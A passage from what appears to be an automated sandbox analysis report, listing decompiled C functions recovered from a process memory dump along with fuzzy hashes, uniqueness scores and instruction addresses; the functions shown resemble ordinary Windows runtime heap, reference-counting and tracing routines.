0x00000000
0x04633854
0x04633856
0x00000000
0x00000000
0x04633863
0x00000000
0x04633863
0x0463381a
0x0463381a
0x0463381f
0x0463386e
0x0463386e
0x04633871
0x04633873
0x04633873
0x04633868
0x00000000
0x04633868
0x04633821
0x04633826
0x00000000
0x00000000
0x04633828
0x0463382a
0x04633841
0x00000000
0x04633841

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb35793d97bba5fd461d4f418716727ca0240b32c8db3a0326ff73d35a48bb08
Instruction ID: 258914262e347f35d47b62e707dd1e0b3cdf310ca5d6fc03fce53e1ddbb49716
Opcode Fuzzy Hash: cb35793d97bba5fd461d4f418716727ca0240b32c8db3a0326ff73d35a48bb08
Instruction Fuzzy Hash: 3B01D672A016909BD3378F1A9940E26BBE6DF95B52715446DED458B310FB34F841C780

Uniqueness

Uniqueness Score: -1.00%

Function 0462002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0462002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04617D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04617D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04617D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04617D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x04620032
0x04620037
0x04620043
0x04664b3a
0x04620049
0x04620049
0x04620049
0x0462004e
0x04620053
0x04664b48
0x04664b5a
0x04664b4a
0x04664b53
0x04664b53
0x04664b5f
0x00000000
0x04664b61
0x00000000
0x04664b61
0x04620059
0x04620059
0x04620060
0x04664b6f
0x04664b6f
0x04620069
0x04664b83
0x00000000
0x00000000
0x04664b90
0x04664b9b
0x04664b9b
0x04664ba4
0x00000000
0x00000000
0x04664baa
0x00000000
0x0462006f
0x0462006f
0x00000000
0x0462006f
0x04620069

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 678d045aa5940f6953927cce32347381677b4a48aff06a251796a30dcc77208e
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: F911DB31705A919FF7229B64DE44B3577E8EF51758F0D00A1DE05877A2FB28F881CA68

Uniqueness

Uniqueness Score: -1.00%

Function 0460766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0460766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0462F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0462F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04614620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x04607672
0x0460767f
0x04607689
0x046076de
0x046076de
0x0460768b
0x04607691
0x04607693
0x04607697
0x00000000
0x04607699
0x046076a8
0x00000000
0x046076aa
0x046076ad
0x046076b1
0x00000000
0x046076b3
0x046076b3
0x046076b5
0x046076ba
0x046076bc
0x046076bc
0x046076c0
0x00000000
0x046076c2
0x046076ce
0x046076ce
0x046076c0
0x046076b1
0x046076a8
0x04607697
0x046076d9

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 49b0b69201ed4254226ad29384f13314bc4677ce0bd9d4d8f3e8504cba1cbb35
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 7501B532710118ABD724AE5ECD40E5B76ADEB84761B244524B909CF290FA21FC0187A4

Uniqueness

Uniqueness Score: -1.00%

Function 0468C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0468C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04639910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E046395B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E046395D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E046395D0();
				return L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0468c458
0x0468c45d
0x0468c466
0x0468c468
0x0468c469
0x0468c46a
0x0468c46b
0x0468c46e
0x0468c46f
0x0468c471
0x0468c476
0x0468c476
0x0468c47c
0x0468c47e
0x0468c480
0x0468c480
0x0468c483
0x0468c484
0x0468c486
0x0468c488
0x0468c48f
0x0468c491
0x0468c493
0x0468c493
0x0468c48f
0x0468c498
0x0468c49e
0x0468c4ad
0x0468c4ad
0x0468c4b2
0x0468c4b4
0x0468c4cd

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 6d75c3837491cb12c9449216fafd9b8e09e90f02a0dffe0d9f0597028032422b
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 800180B2140645BFE621AF65CC80E62BB6DFF543A5F044529F11442660EB61BCA4CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 045F9080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E045F9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x46e85ec;
				E04612280(_t48, 0x46e85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0460FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x46e538c; // 0x773b68c8
					if( *_t84 != 0x46e5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x46cf6e8);
						E0464D0E8(0x46e85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E046C88F5(_t80, _t85, 0x46e5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x46e86c0; // 0x9307b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x46e86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04612280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E046C88F5(0x46e85ec, _t85, 0x46e5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0463AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x46eb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x46e84c0;
																			if(_t82 >=  *0x46e84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E046C9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E045F922A(_t99);
										_t64 = E04617D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E046C8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x46e86c0; // 0x9307b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x46e86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x46e86bc;
													_t87 = 0x46e86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E045F9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x46e86c4;
												_t87 = 0x46e86c0;
												L27:
												E04629B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0464D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x46e5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x46e538c = _t51;
						goto L6;
					}
				}
			}

0x045f9082
0x045f9083
0x045f9084
0x045f9085
0x045f9087
0x045f9096
0x045f9098
0x045f9098
0x045f909e
0x045f90a8
0x045f90e7
0x045f90e7
0x045f90aa
0x045f90b0
0x045f90b7
0x045f90bd
0x045f90dd
0x045f90e6
0x045f90bf
0x045f90bf
0x045f90c7
0x045f90cf
0x045f90f1
0x045f90f2
0x045f90f4
0x045f90f5
0x045f90f6
0x045f90f7
0x045f90f8
0x045f90f9
0x045f90fa
0x045f90fb
0x045f90fc
0x045f90fd
0x045f90fe
0x045f90ff
0x045f9100
0x045f9102
0x045f9107
0x045f910c
0x045f9110
0x045f9113
0x045f9115
0x045f9136
0x045f913f
0x045f9143
0x046537e4
0x046537e4
0x045f9117
0x045f9117
0x045f911d
0x00000000
0x045f911f
0x045f911f
0x045f9125
0x00000000
0x045f9127
0x045f912d
0x045f9130
0x045f9134
0x045f9158
0x045f915d
0x045f9161
0x045f9168
0x04653715
0x045f916e
0x045f916e
0x045f9175
0x045f9177
0x045f917e
0x045f917f
0x045f9182
0x045f9182
0x045f9187
0x045f9187
0x045f918a
0x045f918d
0x045f918f
0x045f9192
0x045f9195
0x045f9198
0x045f9198
0x045f9198
0x045f919a
0x00000000
0x00000000
0x0465371f
0x04653721
0x04653727
0x0465372f
0x04653733
0x04653735
0x04653738
0x0465373b
0x0465373d
0x04653740
0x00000000
0x04653746
0x04653746
0x04653749
0x00000000
0x0465374f
0x0465374f
0x04653751
0x04653757
0x04653759
0x0465375c
0x0465375c
0x0465375e
0x0465375e
0x04653761
0x04653764
0x00000000
0x00000000
0x04653766
0x04653768
0x046537a3
0x046537a3
0x046537a5
0x046537a7
0x046537ad
0x046537b0
0x046537b2
0x046537bc
0x046537c2
0x046537c2
0x046537b2
0x045f9187
0x045f9187
0x045f918a
0x045f918d
0x045f918f
0x045f9192
0x045f9195
0x00000000
0x045f9195
0x00000000
0x0465376a
0x0465376a
0x0465376a
0x0465376c
0x0465376c
0x0465376f
0x04653775
0x00000000
0x00000000
0x04653777
0x04653779
0x04653782
0x04653787
0x04653789
0x04653790
0x04653790
0x0465378b
0x0465378b
0x0465378b
0x04653792
0x04653795
0x00000000
0x04653795
0x00000000
0x04653779
0x04653798
0x00000000
0x04653798
0x00000000
0x04653768
0x0465379b
0x0465379b
0x04653751
0x04653749
0x00000000
0x04653740
0x045f91a0
0x045f91a3
0x045f91a9
0x045f91b0
0x00000000
0x045f91b0
0x045f9187
0x045f91b4
0x045f91b4
0x045f91bb
0x045f91c0
0x045f91c5
0x045f91c7
0x046537da
0x045f91cd
0x045f91cd
0x045f91cd
0x045f91d2
0x045f91d5
0x045f9239
0x045f9239
0x045f91d7
0x045f91db
0x045f91e1
0x045f91e7
0x045f91fd
0x045f9203
0x045f921e
0x045f9223
0x00000000
0x045f9205
0x045f9205
0x045f9208
0x045f920c
0x045f9214
0x045f9214
0x045f920c
0x045f91e9
0x045f91e9
0x045f91ee
0x045f91f3
0x045f91f3
0x045f91f3
0x045f91e7
0x00000000
0x00000000
0x00000000
0x045f9134
0x045f9125
0x045f911d
0x045f914e
0x045f90d1
0x045f90d1
0x045f90d3
0x045f90d6
0x045f90d8
0x00000000
0x045f90d8
0x045f90cf

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca4f66fc0280f3532cc3e565fa9ed23d65852ac4d881f1ae8cf65c219cc55b36
Instruction ID: 7be199d0418f9cc0888ce165b0af965bdd0df1eb4aa367219fc72629676c6199
Opcode Fuzzy Hash: ca4f66fc0280f3532cc3e565fa9ed23d65852ac4d881f1ae8cf65c219cc55b36
Instruction Fuzzy Hash: B901F4B2601A009FE3299F05EC40B2277E9FB81328F25406AEA01DF791E774FC41DB92

Uniqueness

Uniqueness Score: -1.00%

Function 046C4015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E046C4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04612280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04612280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x46e86ac);
					E045FF900(0x46e86d4, _t28);
					E0460FFB0(0x46e86ac, _t28, 0x46e86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0460FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x046c401a
0x046c401e
0x046c4023
0x046c4028
0x046c4029
0x046c402b
0x046c402f
0x046c4043
0x046c4046
0x046c4051
0x046c4057
0x046c405f
0x046c4062
0x046c4067
0x046c406f
0x046c407c
0x046c407c
0x046c408c
0x046c408c
0x046c4097

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40862e57d4f32e6b7991d59c2aa29bdaf2ee1afbaf58b76efb86445287439743
Instruction ID: 6747a9d3d2dbd4266fb2d733ec968beff00fd9c6eef3018ee140f9a6e4d4eb34
Opcode Fuzzy Hash: 40862e57d4f32e6b7991d59c2aa29bdaf2ee1afbaf58b76efb86445287439743
Instruction Fuzzy Hash: 62018472341545BFE215BF79CD80E27B7ACFB45658B040629F50893A61EB24FC11CAE8

Uniqueness

Uniqueness Score: -1.00%

Function 046B14FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E046B14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x46ed360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0463FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04617D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0463B640(E04639AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x046b14fb
0x046b14fb
0x046b150a
0x046b1514
0x046b1519
0x046b151b
0x046b1526
0x046b152c
0x046b1534
0x046b1537
0x046b153a
0x046b1545
0x046b1557
0x046b1547
0x046b1550
0x046b1550
0x046b1562
0x046b1563
0x046b1565
0x046b156a
0x046b157f

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9521136bc07c7d9500bb01388a2ce254f6226ea7d25365687b694275d3a476b9
Instruction ID: 133e2a86c2243013af8297163ebd6547c5b3a9f2ddcb87a9fbae4c2314c019fb
Opcode Fuzzy Hash: 9521136bc07c7d9500bb01388a2ce254f6226ea7d25365687b694275d3a476b9
Instruction Fuzzy Hash: 05018071E00248ABDB04DF69D841EAEB7B8EF45700F00405AB914EB280E674EE40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 046B138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E046B138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x46ed360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0463FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04617D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0463B640(E04639AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x046b138a
0x046b138a
0x046b1399
0x046b13a3
0x046b13a8
0x046b13aa
0x046b13b5
0x046b13bb
0x046b13c3
0x046b13c6
0x046b13c9
0x046b13d4
0x046b13e6
0x046b13d6
0x046b13df
0x046b13df
0x046b13f1
0x046b13f2
0x046b13f4
0x046b13f9
0x046b140e

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6059a457c87f6412b3e2077039218006b2ee64c8ca8c9c62368b1d4cdd3f92ad
Instruction ID: ade1a03758a41df8fa7702f59a5a664aee7c0c51d362e677ee42c3e62f84cd2c
Opcode Fuzzy Hash: 6059a457c87f6412b3e2077039218006b2ee64c8ca8c9c62368b1d4cdd3f92ad
Instruction Fuzzy Hash: A4015271E10358AFDB14DFA9D841EAEB7B8EF45710F00405AB944EB381F674AE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 045F58EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E045F58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x46ed360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x45d5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E045F5943() != 0 &&  *0x46e5320 > 5) {
					E04677B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04677B5E( &_v28, _t28);
					_t11 = E04677B9C(0x46e5320, 0x45dbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0463B640(_t11, _t17, _v8 ^ _t29, 0x45dbf15, _t27, _t28);
			}

0x045f58fb
0x045f58fe
0x045f5906
0x045f590a
0x045f593c
0x045f593c
0x045f590c
0x045f590c
0x045f5911
0x00000000
0x045f5913
0x045f5913
0x045f5913
0x045f5911
0x045f591d
0x04651035
0x0465103c
0x0465103f
0x04651056
0x04651056
0x045f593b

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 932db5378ffc06e6f28d515c23fb2f4c3ec8326d3558b075cf480be72fc6682e
Instruction ID: a633992560b53b179d4dc9143b37246a7851535aed0b71c5488bbd739089054c
Opcode Fuzzy Hash: 932db5378ffc06e6f28d515c23fb2f4c3ec8326d3558b075cf480be72fc6682e
Instruction Fuzzy Hash: 9001A231B00508FBE718EE69ED009AE77ECFF81634F9500699A05AB641FE30FD02D696

Uniqueness

Uniqueness Score: -1.00%

Function 046C1074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046C1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E046C165E(__ebx, 0x46e8ae4, (__edx -  *0x46e8b04 >> 0x14) + (__edx -  *0x46e8b04 >> 0x14), __edi, __ecx, (__edx -  *0x46e8b04 >> 0x14) + (__edx -  *0x46e8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E046BAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04617D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E046AFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x046c1074
0x046c1080
0x046c1082
0x046c108a
0x046c108f
0x046c1093
0x046c10ab
0x046c10ab
0x046c10c3
0x046c10cf
